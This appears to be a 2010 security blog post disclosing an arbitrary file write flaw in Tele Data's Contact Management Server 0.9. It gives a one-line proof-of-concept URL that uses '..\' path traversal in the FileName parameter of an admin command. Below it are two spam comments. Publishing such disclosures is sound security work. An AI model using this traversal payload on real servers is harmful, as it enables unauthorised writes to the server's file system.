skip to main | skip to sidebar

XSS - Cross-Site Scripting

And Other Web Related Deception

This site is soon to be deprecated by http://www.johnleitch.net

Sunday, May 23, 2010

Tele Data's Contact Management Server 0.9 Arbitrary File Write

An arbitrary file write vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to write to the local file system of the server.

PoC
Login as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Save&SQL=hello%20world&FileName=..\..\..\..\..\..\..\..\..\x.txt

Posted by John Leitch at 5:37 PM

Labels: Arbitrary File Write, hacking, security, Tele Data's Contact Management Server 0.9

2 comments:

yanmaneeeSeptember 25, 2019 at 8:15 AM
adidas nmd
nike air force 1 high
adidas stan smith men
nike air vapormax
nike air force 1 low
nike react
supreme outlet
coach factory outlet
jordans
michael kors outlet
ReplyDelete
Replies
Bilal Khatri112October 23, 2019 at 4:20 AM
I’m going to read this. I’ll be sure to come back. thanks for sharing. and also This article gives the light in which we can observe the reality. this is very nice one and gives indepth information. thanks for this nice article... locateanumber
ReplyDelete
Replies

Newer Post Older Post Home

Subscribe to: Post Comments (Atom)

About Me

John Leitch

View my complete profile

Blog Archive

▼ 2010 (71)
- ► July (28)
- ► June (2)
- ▼ May (27)
- ► April (7)
- ► March (7)

► 2009 (20)
- ► November (2)
- ► October (1)
- ► September (6)
- ► August (2)
- ► June (3)
- ► May (6)

Blog Catalog

Computer Security Blogs - BlogCatalog Blog Directory

Blogflux

Blog Flux Local - Michigan

Blogged

Programming Blog Directory

Blogville